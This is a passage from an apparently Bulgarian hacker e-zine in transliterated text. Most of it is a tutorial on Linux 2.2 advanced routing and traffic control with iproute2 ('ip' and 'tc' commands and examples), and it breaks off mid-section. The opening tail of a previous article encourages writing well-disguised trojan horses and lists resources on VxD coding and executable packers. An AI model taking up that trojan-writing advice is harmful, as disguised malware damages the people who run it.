predstawlqwat nqkakuw interes za nas.
Zatowa, predi da sednete da pishete kakuwto i da bilo kon, si pomislete
kakuw e naj-udobniqt nachin za pisaneto mu. Dori i na pruw pogled
po-ploskite idei mogat da se napishat taka, che da stanat dobre zamaskirani
kone, stiga da imate velanie.
ix. Linkz
[1]. http://pages.poly.edu/~slishc01/cs/icq.html
Description of the ICQ protocol version 2.
[2]. http://www.cs.princeton.edu/software/lcc/
LCC Compiler
[3]. http://www.microsoft.com/hwdev/ddk/install98ddk.htm
Windows 98 Driver Development Kit Download
[4]. http://www.geocities.com/Area51/Vault/6702/vxd.html
A page about VxD coding with examples.
[5]. http://www.bytamin-c.com/VisualAssembler/index.htm
Visual Assembler
[6]. http://www.icl.ndirect.co.uk/petite/
Petite File Compressor
[7]. http://www.jps.net/kyunghi/w32comp.htm
Windows Executable Compressors
[8]. http://www.suddendischarge.com/Compressors.html
All types Compressors
[9]. http://www.pgpi.org/products/sdk/c++/
PGP Programming Libraries C/C++
[10]. http://www.crackstore.com/tools.htm
Kolekciq ot dosta polezni programi, ima i helpowete na MS.
[11]. http://ourworld.compuserve.com/homepages/w_baudisch/InsideIE.htm
Undocumented Functions Inside Internet Explorer 4
[12]. http://rfc.nat.bg/documents/rfc822.txt
SMTP Protocol
[13]. http://www.xs4all.nl/~smit - Assembler Language Resources
[14]. http://www.unibest.ru/~ig/docs.html - PE/LE/LX/NE Executable
Formats.
[15]. http://www.csee.uq.edu.au/~csmweb/dcc.html#thesis - The PhD Thesis
(decompilation related);
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#10ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
QoS & Adv.Routing for Linux ManiaX & Renegade
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
<[ 10x to Renegade (kojto dade ideqta da napisha tva neshto i kojto dosta mi
pomogna (naprimer napisa cqlata traffic control chast)), Alexey Kuznetzov
(za prekrasnoto rukovodstvo na ip komandata, chast ot koeto sum prevel tuka
]>
S novite qdra (v 2.2.x) linux-a zapochna da pridobiva mrezhovite
vuzmozhnosti na Cisco router (blagodarenie na Alexey Kuznetzov). Tezi
vuzmozhnosti se vkluchvat ot Network Options/Quality of Services i Network
Options/Advanced routing.
Za da izpolzvame tezi vuzmozhnosti, ni e nuzhen paketa iproute2 (ili
iproute2+tc), dostupen ot ftp.inr.ac.ru/ip-routing. V nego se sudurzhat 2
osnovni programi - ip i tc. Purvata sluzhi za manipulaciq na interfejsi,
routing tablici i t.n., a vtorata - za traffic control. Za purvata ima dulgo
i podrobno rukovodstvo v paketa, a za vtorata e v process na razrabotka. Tuk
shte opisha, dokolkoto mi e vuzmozhno, i dvete komandi.
S komandata ip mogat da se modificirat slednite tipove obekti: link
(modifikaciq na parametrite na interfejsite), route (modifikacii na routing
tablicata), rule (razshireniq na routing tablicata s pravila), address
(zadavane na adresi na interfejsite), maddress (multicast adresi), mroute
(multicast routing), tunnel (suzdavane na tuneli, kato naprimer
IPv6-in-IPv4, neighbour (arp tablica). Lesno se zabelqzva, che tazi komanda
mozhe da zameni ako ne celiq, to pochti celiq netbase.
ip link ima slednite komandi: ip link set ili ip link show (default). ip
link show pokazva vsichki interfejsi s tehnite parametri, a na ip link set
mogat da se popadat slednite parametri:
dev <device> - interfejs za manipulaciq
up | down - dali e 'up' (t.e. rabotesht) ili ne
arp op |arp off - dali interfejsa da izpolzva ARP ili ne.(rezultatut
ot ip link set arp off dev xxx ako interfesa xxx e up mozhe da
bude mnogo nepriqten)
multicast on|off - multicast poddruzhka na interfejsa
name <name> - smenq imeto na interfejsa (ot eth0 na xxx0 naprimer)
txqueuelen <txq> | txqlen <txq> - golemina na transmit opashkata
mtu <mtu> - smenq MTU-to(Maximum transmit unit) na interfejsa
address <ADDRESS> - smenq link-layer adresa (t.e. ethernet adresa)
broadcast | brd | peer <ADDRESS> - smenq broadcast ili
point-to-point link-layer adresa na interfejsa.
Sushto taka na ip link show mozhe da bude podadena opciq -statistics, koqto
da izvede statistika za interfejsa.
Primer za izpozvaneto na ip link e sledniqt :
ip link set dev eth0 address 2.3.4.5
ip link set dev eth0 arp on
ip link set dev eth0 up
Tova vsushtonost configurira eth0 s adres 2.3.4.5, da izpolzva ARP i da
vkluchi interfejsa.
ip link set dev ppp0 txqueuelen 100
Tozi red puk uvelichava transmit opashkata na ppp0 interfejsa, pravejki go
kato ethernet - udobno e za ppp-on-ethernet vruzki, za da se izpolzva
pulnocenno prenosnata sreda.
Na ip route mogat da se podavat slednite komandi: add, change, replace,
delete, show, flush, get.
<[ Kratka zabelezhka: V linux-2.2.x tipovete entry-ta na routing tablica sa
slednite:
unicast -- Opisva istinski put do opredeleno mqsto.
unreachable -- Adresut e nedostupen,vurshta se ICMP suobshtenie
host unreachable. Programata,izpratila paketa, poluchava greshka EHOSTUNREACH.
blackhole -- Adresut e nedostupen,ne se vrushta ICMP suobshtenie,
programata, izpratila paketa poluchava greshka EINVAL.
prohibit -- Adresut e nedostupen,vrushta se ICMP suobshtenie
communication administratively prohibited.Programata,generirala
paketa poluchava greshka EACCES.
local -- Localen,vishcki paketi se vrushtat v localnata mashina.
broadcast -- Adresut e broadcast adres, paketite se prashtat kato link
broadcast-ove.
throw -- specialen tip, izpolzvan s policy rules. Ako pri look-up na
tablicata se izbere podoben put,look-up-a se prektratqva, kato
se kazva
che nqma podoben route v taq tablica (ako look-up-a se pravi s
policy, a ako ne e ekvivalentno na lipsata na route i se vrushta
ICMP message net unreachable, a programata izpratila paketa -
greshka ENETUNREACH.
nat -- t.nat. Network Address Translation,vsichki paketi sus takuv
source se maskirat prez adresa podaden s parameter-a via.
anycast -- ne e napisan.....
multicast -- specialen tip,izpolzvan v multicast routing-a.Ne se sreshta
v normalnite routing tablici. ]>
ip route add, change i replace poddurzhat slednite opcii:
to PREFIX ili to TYPE PREFIX
-- Otsreshtna tochka. Ako TYPE ne e zadaden, ip podrazbira tip unicast.
PREFIX e IP or IPv6 adres s opcionalna netmaska .Sushto taka ima
edin specialen PREFIX - default, kojto e ekvivalenten v IPv4 0/0
ili na ::/0 v IPv6
tos TOS ili dsfield TOS
-- Type Of Service (Tip na uslugata) . Izpolzva se,za da mogat da se
izpolzvat razlichni putishta za paketi s razlichni ToS poleta.
metric NUMBER or preference NUMBER
-- Prioritet/dulzhina na route.NUMBER e normalno 32bitovo chislo.
table TABLEID
-- Tablica v koqtp da se vkluchi tozi route.TABLEID mozhe da e
chislo,ili string,ukazvasht fajl v /etc/iproute2/rt_tables. Ako tozi
parameter go nqma,ip podrazbira tablicata main,s izkluchenie na
local, broadcast i nat route-ovete, koito vliza po podrazbirane v
tablica local.
dev NAME
-- ime na izhodnoto ustrojstvo.
via ADDRESS
-- adresa na sledvashtiq router. Fakticheski, znachenieto zavisi ot tipa
route. Za normalni unicast route-ove e ili chistiq sledvasht router,
ili adresa na interface prez kojto da se prati, ako e adres instaliran
v BSD. Za NAT route-ove tova e adresa za maskirane na minavashtite
vruzki.
src ADDRESS
-- Izhoden adres ot kojto da se prashtat paketite, popadashti v tova
routing pravilo.
realm REALMID
-- ' realm' v kojto popada tozi route. REALMID mozhe da e chislo ili
string ot fajla /etc/iproute2/rt_realms.
mtu MTU or mtu lock MTU
-- MTU-to po putq do otsreshtniq adres.Ako ne se izpolzva lock,MTU-to
mozhe da se promenq ot kernel-a s Path MTU Discovery. Ako se izpolzva
lock, nqma da se izpolzva Path MTU Discovery, Vsichki paketi shte se
izprashtat bez DF bit-a v IPv4 case ili fragmented bit-a for IPv6.
window NUMBER
-- maksimalniqt TCP window za pozvolqvane do tezi mesta v bajtove.
Ogranichava maximalniq burst na danni, koito mogat da budat praeni do
hosta po TCP.
rtt NUMBER
-- nachalnoto RTT (`Round Trip Time'') .
<[ Belezhka Vsushtnost,v Linux-2.2 (i 2.0) to ne e tochno RTT, a timeout-a
pri nachalo na TCP vruzka. Kernel-a spira da go izpolzva pri purviq polichen
validen ACK. ]>
nexthop NEXTHOP
-- Sledvashtiq hop na multipath route. NEXTHOP e kompleksna stojnost
sus sintaksis podoben na tozi na ostanalite parametri ot tipa na add:
via ADDRESS e sledvashtiq router.
dev NAME e ustrojstvoto.
weight NUMBER e 'tezhestta' ili 'stojnostta' na tozi route v
multipath-a bazirana na skorostta ili kachestvoto.
scope SCOPE_VAL
-- scope of the destinations covered by the route prefix. SCOPE_VAL may
be a number or a string from the file /etc/iproute2/rt_scopes. If this
parameter is omitted, ip assumes scope global for all gatewayed
unicast routes, scope link for direct unicast routes and broadcasts
and scope host for local routes.
protocol RTPROTO
-- routing protocol za tozi route. RTPROTO mozhe da e chislo ili
string ot fajla /etc/iproute2/rt_protos. Ako ne e zadaden takuv, ip
priema protocol boot (t.e.takuv, dobaven ot nqkoj, kojto ne znae kvo
pravi). Nqkolko takiva stojnotsi imat fiksirano znachenie :
redirect -- route instaliran ot ICMP redirect.
kernel -- route instaliran ot kernel-a po vreme na avtokonfiguraciqta.
boot -- route,instaliran po vreme na boot-a.Ako bude startiran
routing daemon,toj bi gi iztril.
static -- route instaliran ot administratora za da preskochi
dinamichniq routing. Routing daemon-a mozhe bi nqma da gi zakache i,
mozhe bi, dori shte gi 'advertise'-va do susedite si..
ra -- route instaliran ot Router Discovery protocol.
Ostanalite stojnosti ne sa rezervirani i administratora mozhe da gi
zadava za razlichni protocoli. Naj-malko, routing daemon-ite trqbva
da se pogrizhat da izpolzvat unikalna za sistemata vuzmozhnost, kato
tezi v rtnetlink.h ili v rt_protos.
onlink
-- kazva che sledvashtiq hop e direktno svurzan za tazi vruzka,dazhe i
ako ne pasva na kojto i da e interfejs.
equalize
-- Pozvolqva equalizaciq po randiom nachin po multipath routes. Bez tazi
opciq route shte bude opredelen do edin sledvasht hop, taka che
razdelqneto na trafika shte se poluchavqa samo na baza na trafik.
equalize raboti samo na patchnati kernel-i (? )
Primer :
ip route add 192.168.0.0/24 dev eth0 srv 1922.168.0.4
ip route add 192.168.1.0/24 dev eth1
ip route add 193.200.17.97 dev eth0 src 193.200.17.103 onlink
ip route add 193.200.17.101 dev eth0 src 193.200.17.103 onlink
ip route add 193.200.17.98 dev eth0 src 193.200.17.103 onlink
ip route add 193.200.17.105 via 193.200.17.98 src 193.200.17.103
ip route add 193.200.17.102 via 193.200.17.98 src 193.200.17.103
ip route add default via 193.200.17.97 src 193.200.17.103
Tuk imame mashina s 2 mrezhovi karti, koqto ima 3 adresa: 192.168.1.1 na
eth1, i 192.168.0.4 i 193.200.17.103 na eth0. Tq e samba server na mrezhata
i kogato osushtestvqva vruzki do 192.168.xx izpolzva 192.168.xx adresite
si,a kogato se svurzva kum relani adresi, izpozva realniq si adres. Sushto
taka ima 2 host-a za koito minava prez drug router (193.200.17.98), a ne
prez glavniq si (193.200.17.97), kakto i 3 mashini, koito sa i na lan-a.
Drug primer :
ip route add default scope global nexthop dev ppp0 nexthop dev ppp1
Tuk defaultroute se razdelq m/u ppp0 i ppp1 poravno, t.e. pravi se load
balancing.
ip route add defaulte qualize scope global nexthop via 193.200.17.98 nexthop via 193.200.17.99
Tuk se postiga sushtoto kato v gorniq primer,no se ipozlvqa po-dobriq nachin
- s IP adresi, zashtoto imenata na interfejsite sa dinamichni, i se
izpolzva equalizaciq.
ip route delete ima podobni opcii kato ip route add, s tazi razlika, che se
iztriva route, kojto ima sushtite opcii, kato tezi podadeni na komandata,
kato obache ne e zadulzhitelno da se podadat dokraj vsichki opcii za tozi
route, ako nqma podobni na nego v routing tablicata.
ip route show sushto taka ima podobni opcii, no s nego se izvezhdat
route-ovete koito imat podobni parametri.
eto edin primer:
eosnw:~# ip route show
193.200.17.97 dev eth0 scope link
193.200.17.98 dev eth0 scope link
193.200.17.101 dev eth0 scope link
193.200.17.102 via 193.200.17.98 dev eth0 src 193.200.17.103
193.200.17.105 via 193.200.17.98 dev eth0 src 193.200.17.103
192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.1
192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.4
default via 193.200.17.97 dev eth0 src 193.200.17.103
Tuk route-ovete do 192.168.xx sa dobaveni ot kernel-a,zashtoto ifconfig pri
2.2.x kernel-i avtomatichno dobavq route kum address/netmask prez tozi
interface.
ip route flush puk se ralzlichava ot ip route show samo po tova,che iztriva
vsichkite route-ove koito imat takiva parametri kato zadadenite na
komandata.
ip route get puk proverqva prez koj route shte mine paket s svojstva kato
tezi, zadadeni na komandata. (Vnimanie! Tova ne e tochno ip route show... -
pri rules i t.n. rezultata mozhe da e razlichen. ip route get povatarq
dejstviqta na kernela pri lookup na routing rablicite.)
ip rule pozvolqva da se zadavat pravila,na baza na koito da se pravi lookup
v drugi routing tablici - po tozi nachin mozhe da se pravi routing,
baziran ne samo na destination adresa, no i na baza na source adres, na ToS,
na vhoden interfejs. ip rule ima nqkolk ovuzmozhni komandi: add, delete i
show.
Tezi rule-ove mogat da budat slednite tipove:
unicast -- Vrushta route ot routing tablicata, kum koqto sochi rule-to.
blackhole -- Dropva paketite direktno..
unreachable -- Vrushta greshka `Network is unreachable''.
prohibit -- Vrushta greshka `Communication is administratively prohibited''.
nat -- Praviloto translira source adresa.
ip rule add ima slednite opcii:
type TYPE (po podrazbirane)
-- tip na praviloto.
from PREFIX
-- Izhoden adres na paketa.
to PREFIX
-- destination adres na paketa.
iif NAME
--izbira incoming interfejs. Ako interfejsa e loopback-a, praviloto
obhvashta samo paketi,izprateni ot tozi host.Po tozi nachin mogat da se
napravqt routing tablici za paketi, izprateni ot host-a i za forward-nati
paketi i taka da se razdelqt izcqlo dvata trafika.
tos TOS ili dsfield TOS
-- samoobqsnqvashto se .
fwmark MARK
-- za kakuv fwmark da se otnasq.
<[ Belezhka: fwmark e vuzmozhnost s ipchains na opredelni paketi da se
postavq t.nar. fwmark,t.e. da se pravi routing na bazata na ipchains pravila
.... ]>
priority PREFERENCE
-- prioritet na praviloto . Vsqko pravilo bi trqbvalo da ima unikalen
zaden prioritet
<[
Belezhka:
Vsushtnost, po istoricheski prichini ip rule add ne iziskva nikakuv
prioritet.Ako potrebitelqt ne zadade nqkakuv priotitet, kernel-a mu izbira
sam, a ako zadade s takuv prioritet, kojto sushtestvuva, go postavq predi
vsichki po-stari pravila sus suhtitq prioritet.
Kakto kazva Kuznetzov: "It is mistake in design, not more. And it will be
fixed one day, so that do not rely on this feature, use explicit
priorities."
]>
table TABLEID
-- routing tablica v koqto da se lookup-va, ako paketut otgovarq na
praviloto..
realms FROM/TO
-- 'Realm'-ove koito da se izpolzvat ako paketut otgovarq na praviloto.
nat ADDRESS
-- Baza na blok-a ot IP adresi za translirane na source adres-a.ADDRESS
mozhe da e ili nachaloto na blok ot IP adresi,izbrani ot NAT route-ove,
ili lokalen adres (ili dori nula).V posledniq sluchaj router-a ne gi
translira, a gi maskira s tozi adres.
Primeri :
ip rule add from 192.203.80.0/24 table 13 prio 220
Tova routira vsichko ot 192.203.80.0/24 prez pravilata na tablica 13.
ip rule add iif eth0 from 192.168.1.0/24 type blackhole prio 100
Tova dropva vsichki paketi polucheni prez eth0 ot adresi 192.168.1.0/24.
ip rule del iif eth0 prio 100
Tova iztriva predishnoto pravilo.
S ip rule show se pokazv spisuk na pravilata, definirani do momenta.
Primer :
eosnw:~# ip rule show
0: from all lookup local
100: from 192.168.1.0/0 iif eth0 lookup main blackhole
32766: from all lookup main
32767: from all lookup 253
ip address pozvolqva dobqne/premahvane na adres ot interfejs - tova e koeto
pozvolqvashe ip aliasing-a , no v mnogo po-dobur vid.Sega mozhe da imate
10000 vhosta-a na mashinata si bez nito edin virtualen interfejs.Komandata
ima 4 vuzmozhni podkomandi : add,delete,show,flush.
ip address add/delete imat slednite parametri :
dev NAME
-- Ustrojstvoto na koeto da bude dobaven adres-a.
local ADDRESS (po podrazbirane)
-- adres na interfejsa. Formatut mu zavisi ot tova dali e IPv4 ili IPv6
i se zapisva po standartnite za tqh nachini. ADDRESS mozhe da bude
sledvano ot '/' i chislo,koeto da zadava direktno cqla mrezha adresi na
interfejsa.
peer ADDRESS
-- adres na otsreshtnata tochka.Pak kato pri local,mozhe da se izpolzva
'/' i chislo, opdelelqshti netmaskata na adresa.Ako se zadava takuv
adres, lokalniq adres ne mozhe da ima /xx .
broadcast ADDRESS
-- broadcast adres za interfejsa.
Vuzmozhno e da se izpolzvat '+' i '-' vmesto samiq adres.V tozi sluchaj
broadcast adresa se smqta,kato se slagat/nulirat bitovete v host chasta
na interface adresa.
label NAME
-- Na vseki adres mozhe da se opredelq otdelno ustrojstvo. Za da se
poddurzha suvmestimostta s linux-2.0 alias-ite, tozi string trqbva da
suvpada s imeto na interfejsa ili da bude imeto na interfejsa,sledvano ot
':' i nomer.
scope SCOPE_VALUE
-- 'scope' na zonata, v koqto tozi adres e validen. Vuzmozhnite
'scope'-ove sa zapisani vuv fajla /etc/iproute2/rt_scopes. Specialni
takiva stojnosti sa:
global -- adresut e globalno valide .
site -- (samo za IPv6) Validen e samo v tozi site.
link -- Validen e samo za tova ustrojstvo.
host -- Validen e samo za tozi host.
Primeri :
ip address add 192.168.0.1 dev eth0
ip address add 192.168.1.1 dev eth0
ip address add 192.168.2.1 dev eth0
ip route add 192.168.0.0/24 dev eth0 src 192.168.0.1
ip route add 192.168.1.0/24 dev eth0 src 192.168.1.1
ip route add 192.168.2.0/24 dev eth0 src 192.168.2.1
Tuk naprimer se suzdavat 3 logicheski mrezhi v/u edna fizicheska i te mogat
da rabotqt nezavisimo edna ot druga,nezavisimo da im se pravi shaping i
accounting i t.n.
Drug primer :
ip address add 194.12.235.195 dev eth0
ip address add 194.12.235.199 dev eth0 name eth0:0
Tova dava primary adres na eth0 194.12.235.195 i suzdava alias eth0:0 s
adres 194.12.235.199.
ip address show/flush imat ednakvi parametri,a se razlichavat samo po tova,
che ednata komanda pokazva adresite,suotvetstvashti na kriteriq, podaden
na komandata, a drugata gi iztriva. Vuzmozhnite parametri sa :
dev NAME (po podrazbirane)
-- ime na interfejsa.
scope SCOPE_VAL
-- samo adresiet v tozi 'scope'.
to PREFIX
-- samo adresi suvpadashti s tozi PREFIX.
label PATTERN
-- samo adresi chieto ime suvpada s PATTERN. PATTERN e normalnel
shell-ski patterm (eth*, eth1:?)
dynamic i permanent
-- (samo zaIPv6) Pokazva statichni ili dinamichni adresi.
tentative
-- (samo za IPv6) samo adresi, koito ne preminavat prez duplicate address
testa..
deprecated
-- (samo IPv6) samo bezsmisleni (nenuzhi )adresi.
primary i secondary
-- samo glavni (ili vtorichni) adresi.
Primeri :
eosnw:~# ip address show
1: lo: <LOOPBACK,UP> mtu 3924 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
2: teql0: <NOARP> mtu 1500 qdisc noop qlen 100
link/generic
3: eth0: <BROADCAST,MULTICAST,PROMISC,UP> mtu 1500 qdisc pfifo_fast qlen 100
link/ether 00:20:af:3c:07:f7 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.4/24 brd 192.168.0.255 scope global eth0
inet 193.200.17.103/32 scope global eth0
4: eth1: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 100
link/ether 00:20:af:3c:08:0f brd ff:ff:ff:ff:ff:ff
inet 192.168.1.1/24 brd 192.168.1.255 scope global eth1
Taka se vizhdat vsihcki interfejsi ...
eosnw:~# ip address show label "eth*"
3: eth0: <BROADCAST,MULTICAST,PROMISC,UP> mtu 1500 qdisc pfifo_fast qlen 100
link/ether 00:20:af:3c:07:f7 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.4/24 brd 192.168.0.255 scope global eth0
inet 193.200.17.103/32 scope global eth0
4: eth1: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 100
link/ether 00:20:af:3c:08:0f brd ff:ff:ff:ff:ff:ff
inet 192.168.1.1/24 brd 192.168.1.255 scope global eth1
A taka samo tezi koito se kazvat eth* .
Drugo koeto mozhe da se pravi s komandata ip,e da se suzdavat t.nar. tuneli
- napirmer ot tipa IPv6-in-IPv4 (koito polzvolqvat na mrezhi/hostove,
koito imat prqka vruzka s mrezhi/hostove podurzhashti samo IPv4, da polzvat
IPv6 kato minavat prez drugo mqsto, koeto poddurzha IPv6).
S ip tunnel se manipulirat tezi t.nar.tuneli.Tazi komanda ima slendite
podkomandi : add,change,delete,show .
ip tunnel add/change/delete ima slednite opcii :
name NAME (default)
-- Zadava imeto "NAME" na tunela.
mode MODE
-- Zadava tip na tunela.Za momenta sushtestvuvshti sa ipip, sit i gre.
<[
Belezhka:
IPIP tunelite sa standartna enkapsulaciq na paket v paker.GRE tunelite sa
proizvedenie na CISCO,koeto e preporuchitelno da se izpolva,ako
otsreshtnata tochka e CISCO router, a i tozi protokol podduzha multicast
vutre v samiq tunel. ( a i vse pak CISCO si ostavat specialistite v tazi
oblast :) )
]>
remote ADDRESS
-- Zadava adres na otreshtnata tochka v tunela.
local ADDRESS
-- Zadava fiksiran source adres na izprashtanite prez tunela
paketis.Tozi adres trqbva da bude adres na nqkoj interfejs na mashinata.
ttl N
-- Zadava fiksirano TTL za tuneliranite paketi. N e chislo ot 1 do 255.
0 e specialna stojnost,znacheshta che paketut ne promenq TTL-to si.
tos T or dsfield T
-- Zadava fiksiran TOS "T" za tuneliranite paketi. Po podrazirane ne se
promenq.
dev NAME
-- Zadulzhava tunela da pozlva interfejsa NAME, taka che paketite da ne
minavat prez drugi interfesi, ako routinga se promeni.
nopmtudisc
-- Maha Path MTU Discovery-to za tunela,koeto e vklucheno po
podrazbirane. Tazi opciq e nesuvmestima s fiksiranoto TTL : tunel s
fiksirano TTL vinagi pravi Path MTU discovery.
key K, ikey K, okey K
-- (samo za GRE tuneli) da izpolzva 'keyed' GRE s kluch K. K e ili
chislo, ili IP address d. Parameterut key zadava klucha za izpozvane v
dvete posoki, a ikey i okey - suotvetno samo za izhodni ili samo za
vhodqshti paketi.
csum, icsum, ocsum
-- (samo za GRE tunneli) checksum proverka za tuneliranite paketi. ocsum
proverqva samo outgoing paketite,a icsum -samo incoming paketite.csum e
ekvivalentno na kombinciqta ot dvata flaga icsum i ocsum.
seq, iseq, oseq
-- (samo za GRE tuneli) Da 'serializira' paketite. Tuk pak oseq/isec
vklucvhat tazi opciq suotvetno za vhodnite/izhodni paketi.
<[
Belezhka:
Spored A.Kuznetzov,tazi opciq ne raboti,ili pone ne e testvana.Ne e i
izvestno kak tochno trqbva da raboti i za kakvo tochno sa misleli da
izpolzvat CISCO tazi opciq.
]>
ip tunnel show pokazva sushtestvuvashtite tuneli v momenta.
<[ Tova po-nadolu e proizvedenie na Renegade v/u traffic control-a ]>
Traffic Control
S tova bih iskal da hvurlia malko svetlina vurho podrruzkata na Traffic
Control, i Quality of Service v kernelite 2.2.x
Za da se kompilira kernela s taia poddruzka, triabva da se kompilirat v
kernela, ili kato moduli Class Based Queueing (CBQ), Tocken Bucket Flow
(TBF), Traffic Sharpers, kakto i RED.
Sled tova, neobhodima e iproute2, za da moze da se izpolzvat tia funkcii na
kernela. tia moze da se svali ot ftp://ftp.sunet.se/pub/Linux/ip-routing
Principyt, na koito raboti traffic control (tc), e slednia: Vhodiashtite
paketi se proveriavat dali sa za dadena tochka, i ako tova e taka, te se
izprashtat za obrabotka na po-visok sloi. V protiven sluchai se gleda
routing tablicata, za da se ustanovi sledvashtia hop za paketa. Sushto taka,
po-visokia sloi sushto moze da generira traffic, koito da kara forwarding
agent procesite da tursiat sledvashtia hop. Kogato tova stane, forwarding
agenta slaga dadenia paket kam izhodnia interface za predavane imenno tuk
linux traffic controla pochva da vurshi rabota.
Linux Traffic Controla e baziran na 3 osnovni bloka:
- Queueing disciplina
- Clasove
- Filtri
1. Queueing (opashki)
Vseki interface ima nachin za obrabotvane na opashkite, asociirani kam nego.
Nai-prostata e FIFO. Ima niakolko tipa na queueing, koito se poddurzat v
momenta:
Class Based Queue
Token Bucket Flow
CSZ
First In First Out
Priority
TEQL
SFQ
ATM
RED
Niakoi ot tezi disciplini izpolzvat filtri, za da klasificirat paketite v
razlichni klasove, i da gi obrabotvat spriamo tova. Tova pozvoliava daden
paket da ima prioritet nad drug. Takiva sa naprimer FIFO, CBQ.
Queueing disciplinite i klasovete sa vurzani edno s drugo. Prisustvieto na
klasove e fundamentalna opcia za queueing disciplinata. Sushto taka,
filtrite mogat da budat kombinirani sas queueing disciplini i klasove.
Klasove
Opashkite i klasovete sa tiasno svurzani. Vseki klas ima opashka. Clasovete
se identificirat spriamo class ID i internal ID. Class ID-to se zadava ot
potrebitelia, dokato internal ID-to se zadava ot queueing disciplinata.Class
ID-to ima struktura major:minor. Major nomera sochi instanciata v Queueing
disciplinata, ot koiato zavisi. Minor nomera identificira toia klas v
dadenata disciplina.
za poveche opdrobnosti moze da se vidi include/net/pkt_sched.h.
TC (Traffic Controller)
'tc' (traffic controller) e potrebilteska programa, koiato e grubo kazano
frontend kam sazdavaneto i asociiraneto na opashki kam dadeni izhodni
interfeisi. Tia se izpolzva za sazdavaneto na razlichni vidove opashki i
asociirane na klasove kam vsiaka to tezi opashki. Sushto taka moze da se
izpolzva za slagane na filtri bazirani na routing tablicata, u32
klasifikatorite, kakto i RSVP klasifikatorite. Tia izpolzva netlink
socket-ite kato mehanizam za komunikirane s mrezovite funkcii na kernela.
tc se izpolzva po slednia nachin
tc [ OPTIONS ] OBJECT { COMMAND | help }
kadeto: OBJECT := { qdisc | class | filter }
OPTIONS := { -s[statistics] | -d[details] | -r[raw] }
OBJECT moze da bude queueing disciplina, class ili filter
Queuing disciplina:
Sintaksisa za sazdavane na queueing disciplina e slednia :
tc qdisc [ add | del | replace | change | get ] dev STRING
[ handle QHANDLE ] [ root | parent CLASSID ]
[ estimator INTERVAL TIME_CONSTANT ]
[ [ QDISC_KIND ] [ help | OPTIONS ] ]
tc qdisc show [ dev STRING ]
Kadeto:
QDISC_KIND := { [p|b]fifo | tbf | prio | cbq | red | etc. }
hande-to predstavliava unikalen handle, daden na dadenata disciplina ot
sazdatelia. Ne moze da ima dve disciplini s ednakav handle.
root pokazva, che dadenata disciplina e root v sharing ierarhiata. parent
pokazva parent (roditelia) na dadenata disciplina
Za da se sazdade class based queue:
tc qdisc [ add | del | replace | change | get ] dev STRING \
cbq bandwidth BPS [ avpkt BYTES ] [ mpu BYTES ] [ cell BYTES ] [ ewma LOG ]
Kadeto:
bandwidth - maksimum skorost na dadenia interfeis
mpu - mimiimum bytes koito da se izprashtat v daden paket
primer:
tc qdisc add dev eth0 root handle 1: cbq bandwidth 10Mbit allot 1514 cell 8 avpkt 1000 mpu 64
V dadenia primer, Class Based Queue se sazdava, i se vruzva kam eth0.
handle-to e 1: (koeto e 1:0). Obshtata vazmozna skorost e 10Mbit
Klasove
Sintaksisa za suzdavane na klasove e slednia:
tc class [ add | del | change | get ] dev STRING
[ classid CLASSID ] [ root | parent CLASSID ]
[ [ QDISC_KIND ] [ help | OPTIONS ] ]
tc class show [ dev STRING ] [ root | parent CLASSID ]
Kadeto:
QDISC_KIND := { prio | cbq | etc. }
QDISC_KIND moze da bude niakoia ot Queueing disciplinite, koito poddyrzat
klasove.
Drugite poleta sa:
classid: predsavliava handle-to, koeto e dadeno na toia klas ot
suzdatelia.
root: pokazva, che toia klas e root klas v sharing ierarhiata.
parent: pokazva handle-to na roditelia na dadenata queueing disciplina
Class Based Queue
Za da se sazdade CBQ sintaksisa e slednia:
cbq bandwidth BPS rate BPS maxburst PKTS [ avpkt BYTES ]
[ minburst PKTS ] [ bounded ] [ isolated ]
[ allot BYTES ] [ mpu BYTES ] [ weight RATE ]
[ prio NUMBER ] [ cell BYTES ] [ ewma LOG ]
[ estimator INTERVAL TIME_CONSTANT ]
[ split CLASSID ] [ defmap MASK/CHANGE ]
Kadeto:
bandwidth - pokazva maksimalnata skorost, koiato e vuzmozna za queueing
disciplinata ot toia klas
rate - predstavliava skorostta, koiato se dava na toia klas
avpkt - predstavliava srednia broi baitove v paket, za toia klas
bounded - pokazva, che toia klas ne moze da "vzima nazaem" neizpolzvana
skorost ot parent clasa si.
isolated - pokazva, che klasa niama da deli skorost sas niakoi drug
klas.
Neka vidim edin primer:
tc class add dev eth1 parent 1:1 classid 1:2 cbq bandwidth 10Mbit rate
1Mbit allot 1514 cell 8 weight 100Kbit prio 3 maxburst 20 avpkt 1000
split 1:0 defmap c0
V dadenia primer se suzdava CBQ klas sas handle 1:2. Negovia roditel se
identificira s handle 1:1. Srednia razmer na paketa e 1000 baita. Split
tochkata e 1:0, koeto pokazva root-a na sharing procedurata.
Filtri:
Sintaksisa za sazdavane na filtri e:
tc filter [ add | del | change | get ] dev STRING
[ prio PRIO ] [ protocol PROTO ]
[ root | classid CLASSID ] [ handle FILTERID ]
[ [ FILTER_TYPE ] [ help | OPTIONS ] ]
tc filter show [ dev STRING ] [ root | parent CLASSID ]
Kadeto:
FILTER_TYPE := { rsvp | u32 | fw | route | etc. }
FILTERID := ... Formata zavisi ot clasifikatora
prio - pokazva priority na dadenia filter
Ostanalite opcii biaha razgledani po-gore.
Route klasifikatorite klasificirat paketite spriamo routing tablicata.
Sintaksisa e slednia:
tc filter [add | del | change | get] dev STRING
[parent PARENTID] [protocol PROTO]
[prio PRIORITY] route
Kadeto:
PROTO = {ip | icmp | etc.}
Eto i edin primer:
tc filter add dev eth0 parent 1:0 protocol ip prio 100 route
Za da se zadadat pravila kam filtera:
